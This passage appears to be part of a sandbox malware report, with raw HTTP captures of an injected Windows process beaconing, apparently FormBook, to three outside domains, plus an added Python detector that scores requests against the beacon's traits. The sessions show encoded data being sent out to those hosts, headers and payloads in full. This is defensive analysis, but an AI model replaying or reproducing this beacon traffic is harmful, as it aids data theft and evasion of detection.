                                                    Data Ascii: V6h=2Me1hDQn64iv6Nls/VOWyA9Ptwo1ObRivnrS/6ndjVFY0rnm4PNY6n3atNW7tHj0cK2XtGeWo0hDHeCK79fW+AjUcgPZYHDlMlXWi9G19WjzcRRHqcRFeTpesdTevugWvdTLaH/Dp3Ui66tdrp891cSG67O7uGYAyWGstz0lpLvPKx61jfjKODUgGIVftX+2wtOWWBhjI1WvEueco7PsCkNEW56tbsTcja+fcuFU351cYnUHmulbZDyH26hxCUjbBr0a73Op5RVph8Rj//2noD24WL9QL/fk/B7kCMUJ7sQoLi+7mxszbBnHOXRqwvwBBz8XtRw3Jz3kcdsZKOJVicK+oFhsiU+FOyRu1A4URxaZq5tq/eOC4WgxYcirHVlzJ9BU+MG9wPlM5oIdh3KgaSa6orE/3lHg33xCzgN51rPMBdW0VEnMA8mssfY9m7fB4SWTaGJ8GW49tPLVe1jm9ekQw7MXDK7PAg39KUtgqZvxpfruFNrDG1viJ5uIKmXyL54xm8tpzFjq+qhKsmLlrQKPnOpuM+Ug9iCBs0wINLpofyLk7+z7k76NLC0D4Fb7i4QcRmtfuMgIDsiz6NdyeV1R1TEee0wd5la5u2mg3K9JdlEZ4VUvPqm4rFeQ724nhXgmOiWA+D4hEv0tO/9D72ed20OUN1jWkO/oKag/mC6VQD3500EMqi9yifpGYt+6TL/AH6JEAdTHFQ7+7ngsHURlU8sGwxuXMnzZKXeOZIT56Dn9HUcHvoKJF/pYVwU/Q0sTVjcLKEdjToo8Tbp0Ih52CrwxPQ8JcAaRJGv6rtl/6GjMkLocN2/HngnVWGbbRYSGz9ynWAYKr9D8OtDum7BPdV3JmURh+Y0lLKxSU21QbtzQtrq7xqZwjROQfwQupcpM822j0AzYD5yJKuD1HJZ7ydsX57GyIiIcs67BQ5E5xlbKfpgO9CeBQpmPK58hY4egP6P0KMpHPq63ND3P9Q0diIYyJ2oTfG+muw/do29smTyI [TRUNCATED]
                                                    Sep 5, 2024 14:26:49.679217100 CEST | 393 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:49 GMT
                                                    X-Served-By: cache-iad-kjyo7100126-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.5 | 57223 | 34.149.87.45 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:51.824080944 CEST | 452 | OUT | GET /lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:52.280508995 CEST | 548 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:52 GMT
                                                    X-Served-By: cache-iad-kjyo7100042-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


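Sessions 29 to 32 above show one complete beacon cycle against www.formytinyhome.com: three POSTs to /lztc/ with bodies of 204, 224 and 1240 bytes, each a single form parameter V6h=<base64> sent with Origin and Referer pointing back at the Host, Connection: close, Cache-Control: max-age=0 and a fixed Firefox 40 / Mac OS X 10.10 User-Agent coming from a Windows process, followed by a GET that carries the same parameter plus a short sH= token. The server answered every request with a 301 to its HTTPS origin, so this host is not a live C2 in this capture; the same sequence starts again against www.5a8yly.cfd and www.thecivilwearsprada06.site in the sessions that follow. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it decodes a "Data Raw" hex dump back to text and scores a raw request against the traits visible in these sessions. The two malicious requests are reconstructed from sessions 29 and 32 (headers the detector does not inspect are omitted); the benign request, its hostname and its User-Agent are constructed, and the hit threshold in is_formbook_beacon is a judgement call, not something the report states.

```python
import re
from urllib.parse import urlsplit

# Traits taken from sessions 29-32 of the capture.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) "
               "Gecko/20100101 Firefox/40.0")
BEACON_BODY_LENGTHS = {204, 224, 1240}      # Content-Length of the three POSTs
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_data_raw(hex_dump: str) -> str:
    """Turn a report 'Data Raw' dump (space-separated hex bytes) back into text."""
    return bytes.fromhex(hex_dump.replace(" ", "")).decode("latin-1")


def parse_http_request(raw: str) -> dict:
    """Split one raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ", 2) + ["", ""]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "target": parts[1], "headers": headers, "body": body}


def split_form(qs: str) -> dict:
    """Split 'a=b&c=d' without percent-decoding: the beacon sends raw '+' and '/'."""
    out = {}
    for part in qs.split("&"):
        if part:
            name, _, value = part.partition("=")
            out[name] = value
    return out


def _same_host(url: str, host: str) -> bool:
    return bool(host) and urlsplit(url).hostname == host.lower()


def beacon_indicators(raw: str) -> list:
    """Names of the capture's beacon traits present in one request; [] if none."""
    req = parse_http_request(raw)
    h = req["headers"]
    hits = []
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("fixed-ua")
    host = h.get("host", "")
    if _same_host(h.get("origin", ""), host) and _same_host(h.get("referer", ""), host):
        hits.append("self-referencing-origin")
    if h.get("connection", "").lower() == "close" and h.get("cache-control") == "max-age=0":
        hits.append("close-max-age-0")
    if req["method"] == "POST":
        params = split_form(req["body"])
        if len(params) == 1:
            name, value = next(iter(params.items()))
            if len(name) <= 4 and B64_RE.match(value):
                hits.append("single-base64-param")
        if len(req["body"]) in BEACON_BODY_LENGTHS:
            hits.append("beacon-size")
    elif req["method"] == "GET":
        # Session 32: two query parameters, one long base64 blob and one short token.
        params = split_form(urlsplit(req["target"]).query)
        long_b64 = [v for v in params.values() if len(v) >= 64 and B64_RE.match(v)]
        short_tok = [v for v in params.values() if 0 < len(v) <= 16 and v.isalnum()]
        if len(params) == 2 and long_b64 and short_tok:
            hits.append("checkin-get")
    return hits


def is_formbook_beacon(raw: str) -> bool:
    """Threshold is an assumption: the fixed UA plus one traffic-shape trait."""
    hits = beacon_indicators(raw)
    return "fixed-ua" in hits and len(hits) >= 2


def _request(request_line: str, headers: list, body: str = "") -> str:
    """Assemble a raw request with the CRLF framing the capture uses."""
    return "\r\n".join([request_line] + headers) + "\r\n\r\n" + body


# Session 29: first POST to www.formytinyhome.com (headers the detector ignores omitted).
SESSION_29_POST = _request(
    "POST /lztc/ HTTP/1.1",
    ["Host: www.formytinyhome.com", "Connection: close", "Content-Length: 204",
     "Content-Type: application/x-www-form-urlencoded", "Cache-Control: max-age=0",
     "Origin: http://www.formytinyhome.com", "Referer: http://www.formytinyhome.com/lztc/",
     "User-Agent: " + FORMBOOK_UA],
    "V6h=2Me1hDQn64iv7u9ssEOW3g9Oxgo1E7R+vnnS/++AgnpY04vm/tlY4n3arNW3jnixcKihtDa8o3RDG5GK"
    "uoDR1QjWLwPeYHCtMh7ai8yf9W7zdkFH98RKCjpesdTSvugTvdbtaFfTpBoi6YVd4Kk+3cSC2bPkr00F"
    "1wbgihNw0pz9SGW7uJvPGiw6ZsYKq3P5iteDNFA=",
)

# Session 32: the GET that closes the cycle (no Origin, Referer or Cache-Control).
SESSION_32_GET = _request(
    "GET /lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qW"
    "yrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ HTTP/1.1",
    ["Host: www.formytinyhome.com", "Connection: close", "User-Agent: " + FORMBOOK_UA],
)

# Constructed benign request for contrast (hostname and UA are made up).
BENIGN_GET = _request(
    "GET /index.html?q=tiny+home HTTP/1.1",
    ["Host: www.example.com", "Connection: keep-alive",
     "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0.0.0 Safari/537.36"],
)
```

The detector deliberately ignores the destination hosts: all three answered with redirects or a domain-parking page, so a host-based rule written from this capture would match nothing of value, while the request shape (single base64 parameter, self-referencing Origin, the Firefox 40 User-Agent from a Windows host) is what the injected process produces regardless of which domain it tries. The body sizes and the V6h/sH parameter names are specific to this capture and other builds may differ, so treat "beacon-size" and the parameter-name length checks as corroboration rather than as the primary signal.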
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.5 | 57224 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:57.438364983 CEST | 696 | OUT | POST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4b 4c 52 50 6e 70 67 52 70 44 6a 76 70 76 65 70 41 57 50 41 41 45 51 33 37 77 2b 72 56 66 53 57 51 62 49 51 74 4b 73 44 64 59 6f 48 77 61 64 37 51 36 6e 44 73 76 6d 4e 39 56 34 4e 42 55 37 34 4a 6a 31 37 4e 7a 6b 42 48 77 74 38 66 6d 62 6e 54 64 34 34 4f 46 6d 68 62 79 44 47 62 44 32 37 55 78 32 57 66 4e 70 77 2f 37 30 45 6d 4a 4c 74 4b 64 70 62 4e 4e 67 65 77 37 47 4c 77 54 67 46 6d 30 51 54 35 48 51 4c 34 35 42 53 4e 54 63 6b 76 54 46 75 64 53 48 42 48 43 48 66 6c 56 4e 68 49 79 4f 67 4c 6c 51 39 78 44 50 4f 4a 6f 48 63 67 71 4f 79 68 66 58 4c 35 51 51 3d
                                                    Data Ascii: V6h=8fFUnYFewsI0KLRPnpgRpDjvpvepAWPAAEQ37w+rVfSWQbIQtKsDdYoHwad7Q6nDsvmN9V4NBU74Jj17NzkBHwt8fmbnTd44OFmhbyDGbD27Ux2WfNpw/70EmJLtKdpbNNgew7GLwTgFm0QT5HQL45BSNTckvTFudSHBHCHflVNhIyOgLlQ9xDPOJoHcgqOyhfXL5QQ=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.5 | 57225 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:26:59.980089903 CEST | 716 | OUT | POST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4c 76 74 50 33 2b 4d 52 72 6a 69 64 33 2f 65 70 56 6d 4f 4a 41 45 63 33 37 78 37 75 56 74 32 57 51 2b 73 51 73 4c 73 44 65 59 6f 48 34 36 64 79 64 61 6e 59 73 76 37 36 39 51 51 4e 42 55 66 34 4a 69 46 37 4b 43 6b 43 46 67 74 2b 58 47 62 68 4e 74 34 34 4f 46 6d 68 62 79 58 73 62 41 47 37 58 42 47 57 65 6f 46 76 68 72 30 48 78 35 4c 74 4f 64 70 66 4e 4e 68 4c 77 35 79 6c 77 52 6f 46 6d 31 67 54 35 53 6b 49 78 35 42 51 53 44 64 61 75 68 6b 67 58 6b 50 72 48 42 71 4c 33 6e 39 4d 41 6b 6a 4b 52 48 59 56 69 6a 6a 32 5a 37 50 72 78 61 76 62 37 38 48 37 6e 48 48 32 55 79 2f 46 39 66 63 6d 50 7a 33 6e 55 43 33 72 7a 2f 7a 61
                                                    Data Ascii: V6h=8fFUnYFewsI0LvtP3+MRrjid3/epVmOJAEc37x7uVt2WQ+sQsLsDeYoH46dydanYsv769QQNBUf4JiF7KCkCFgt+XGbhNt44OFmhbyXsbAG7XBGWeoFvhr0Hx5LtOdpfNNhLw5ylwRoFm1gT5SkIx5BQSDdauhkgXkPrHBqL3n9MAkjKRHYVijj2Z7Prxavb78H7nHH2Uy/F9fcmPz3nUC3rz/za


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.5 | 57226 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:02.516108990 CEST | 1733 | OUT | POST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4c 76 74 50 33 2b 4d 52 72 6a 69 64 33 2f 65 70 56 6d 4f 4a 41 45 63 33 37 78 37 75 56 74 2b 57 52 49 67 51 75 6f 30 44 66 59 6f 48 6e 4b 64 2f 64 61 6d 4b 73 76 7a 2b 39 51 56 76 42 53 62 34 50 45 35 37 50 77 63 43 50 67 74 2b 56 47 62 6b 54 64 34 58 4f 46 33 6d 62 79 48 73 62 41 47 37 58 44 75 57 59 39 70 76 6a 72 30 45 6d 4a 4c 68 4b 64 70 37 4e 4e 35 62 77 35 32 62 7a 69 51 46 6e 56 77 54 32 41 4d 49 2b 35 42 57 52 44 64 53 75 68 6f 72 58 6c 6e 4e 48 42 76 57 33 6c 64 4d 54 53 53 57 4f 47 4a 50 34 42 7a 41 62 59 7a 51 6e 74 53 38 6b 63 54 6a 6a 30 6d 52 51 78 44 73 31 2f 6f 47 45 68 2b 54 58 58 4c 4f 78 5a 57 76 59 30 37 7a 43 50 43 6c 44 7a 62 35 41 4e 49 33 52 43 30 48 75 34 33 72 65 56 37 6f 39 65 61 4c 78 46 6b 4e 57 76 6f 4e 61 4f 61 34 4d 4c 6a 2b 5a 75 65 2b 4c 6e 6b 35 42 33 6a 59 43 4d 79 6d 58 79 44 36 70 4a 38 6b 2f 33 2f 73 4f 6b 53 61 73 52 6c 31 64 53 7a 6e 48 6a 64 6a 6e 33 55 42 59 48 71 35 53 32 4b 57 32 30 63 6c 36 57 79 77 49 74 [TRUNCATED]
                                                    Data Ascii: V6h=[TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.5 | 57227 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:05.040975094 CEST | 445 | OUT | GET /kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:05.588308096 CEST | 504 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:27:05 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA==&usid=16&utid=34491550499
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.5 | 57228 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:11.136218071 CEST | 741 | OUT | POST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 50 70 31 67 65 45 2b 4e 33 71 6f 32 6a 43 51 30 61 74 41 53 45 36 73 6f 43 52 41 73 54 35 78 6e 53 41 78 4b 78 65 68 6f 4a 49 35 4e 69 64 63 4a 6b 32 51 59 37 39 49 5a 56 54 68 37 78 2f 62 50 6a 78 32 65 73 67 56 75 4f 33 6f 46 5a 41 4c 6d 2b 75 7a 6d 2f 4d 37 54 70 42 66 79 56 71 34 72 72 43 69 37 51 78 49 65 57 58 6c 62 69 66 62 6e 51 4f 75 6e 48 39 38 77 6f 36 45 59 79 63 54 38 73 66 72 4e 7a 78 50 70 69 34 4f 4f 74 54 46 77 2f 69 68 42 34 74 2b 72 4d 33 39 6f 71 2f 7a 74 53 41 46 50 66 69 46 73 2f 48 4c 56 76 71 74 76 4f 69 30 37 46 38 4a 2f 68 62 7a 57 6f 76 78 54 62 53 68 6f 65 6c 63 3d
                                                    Data Ascii: V6h=Pp1geE+N3qo2jCQ0atASE6soCRAsT5xnSAxKxehoJI5NidcJk2QY79IZVTh7x/bPjx2esgVuO3oFZALm+uzm/M7TpBfyVq4rrCi7QxIeWXlbifbnQOunH98wo6EYycT8sfrNzxPpi4OOtTFw/ihB4t+rM39oq/ztSAFPfiFs/HLVvqtvOi07F8J/hbzWovxTbShoelc=
                                                    Sep 5, 2024 14:27:11.584598064 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:10 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: 2dc3d603-9ab0-4cb8-adfe-2009664d7b1c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=2dc3d603-9ab0-4cb8-adfe-2009664d7b1c; expires=Thu, 05 Sep 2024 12:42:11 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 30 68 41 4f 43 51 55 4f 6c 76 36 68 57 59 71 36 73 68 7a 71 63 34 43 6c 50 57 75 51 77 37 4f 46 43 77 4f 36 56 31 4f 72 44 4e 43 58 30 50 6a 33 47 67 6f 6b 44 59 56 6f 4e 72 58 2f 69 42 4f 41 65 55 51 49 75 75 4d 55 39 59 31 62 35 77 64 78 59 4d 4c 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:11.584621906 CEST | 619 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmRjM2Q2MDMtOWFiMC00Y2I4LWFkZmUtMjAwOTY2NGQ3YjFjIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.5 | 57229 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:13.714132071 CEST | 761 | OUT | POST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 50 70 31 67 65 45 2b 4e 33 71 6f 32 6a 6a 67 30 4b 38 41 53 43 61 73 72 4e 78 41 73 63 5a 78 72 53 42 4e 4b 78 66 6c 34 4a 62 64 4e 69 2f 55 4a 6c 7a 38 59 32 64 49 5a 4e 44 68 45 79 50 62 59 6a 78 36 38 73 68 46 75 4f 33 73 46 5a 43 54 6d 2f 64 62 6e 2f 63 37 4e 38 78 66 30 59 4b 34 72 72 43 69 37 51 78 63 30 57 58 74 62 69 73 44 6e 43 38 57 6b 63 64 38 7a 68 61 45 59 6b 73 54 6e 73 66 72 6a 7a 31 50 44 69 39 4b 4f 74 53 31 77 2f 7a 68 4f 68 64 2b 6c 49 33 38 4a 6c 66 66 6c 56 43 42 62 66 6b 4d 2f 6e 46 66 6e 75 63 41 46 55 41 38 54 57 63 6c 48 78 49 37 68 35 66 51 36 42 78 78 59 41 79 4b 6d 70 55 4a 66 71 62 69 42 4c 75 44 42 33 45 42 46 2b 35 41 51
                                                    Data Ascii: V6h=Pp1geE+N3qo2jjg0K8ASCasrNxAscZxrSBNKxfl4JbdNi/UJlz8Y2dIZNDhEyPbYjx68shFuO3sFZCTm/dbn/c7N8xf0YK4rrCi7Qxc0WXtbisDnC8Wkcd8zhaEYksTnsfrjz1PDi9KOtS1w/zhOhd+lI38JlfflVCBbfkM/nFfnucAFUA8TWclHxI7h5fQ6BxxYAyKmpUJfqbiBLuDB3EBF+5AQ
                                                    Sep 5, 2024 14:27:14.188874960 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:13 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: 984b36d8-9910-49d2-9ffc-9c4d3131bb0f
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
